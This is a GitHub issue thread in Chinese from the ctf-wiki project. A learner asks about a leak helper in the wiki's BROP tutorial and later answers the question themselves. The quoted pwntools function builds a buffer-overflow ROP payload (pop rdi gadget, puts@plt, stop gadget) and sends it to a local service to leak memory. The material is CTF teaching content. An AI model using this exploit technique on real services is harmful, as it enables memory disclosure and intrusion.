### ISSUE TITLE
中级rop中leak出二进制代码问题

### ISSUE THREAD

**Issue by Demon-Wang** [ctf-wiki/ctf-wiki#416]
Brop中
leak函数定义：
def leak(length, rdi_ret, puts_plt, leak_addr, stop_gadget):
    sh = remote('127.0.0.1', 9999)
    payload = 'a' * length + p64(rdi_ret) + p64(leak_addr) + p64(puts_plt) + p64(stop_gadget)
    sh.recvuntil('password?\n')
    sh.sendline(payload)
    try:
        data = sh.recv()
        sh.close()
        try:
            data = data[:data.index("\nWelCome")]
        except Exception:
            data = data
        if data == "":
            data = '\x00'
        return data
    except Exception:
        sh.close()
        return None

这部分代码有什么用呢：
        try:
            data = data[:data.index("\nWelCome")]
        except Exception:
            data = data

为什么只取\nWelCome的内容
\nWelCome前面为什么有一个\n呢
 ‘WelCome my friend,Do you know password?’存于rodata段里面
如果缺少了Welcome，那岂不是leak出来的code 偏移计算会出现问题？

def leak函数每次是重新启动一个进程？ 上一次函数的结果会对之后造成影响还是rev缓冲区残留啥的吗？python学的不好:)

**Comment by iromise** [comment]
不好意思，事情有点多，我尽量今晚处理。

**Comment by Demon-Wang** [comment]
> 不好意思，事情有点多，我尽量今晚处理。

想明白了 就是截断了pwntools recvuntil的后半部分内容
一开始是因为recvuntil的功能没弄懂 :)
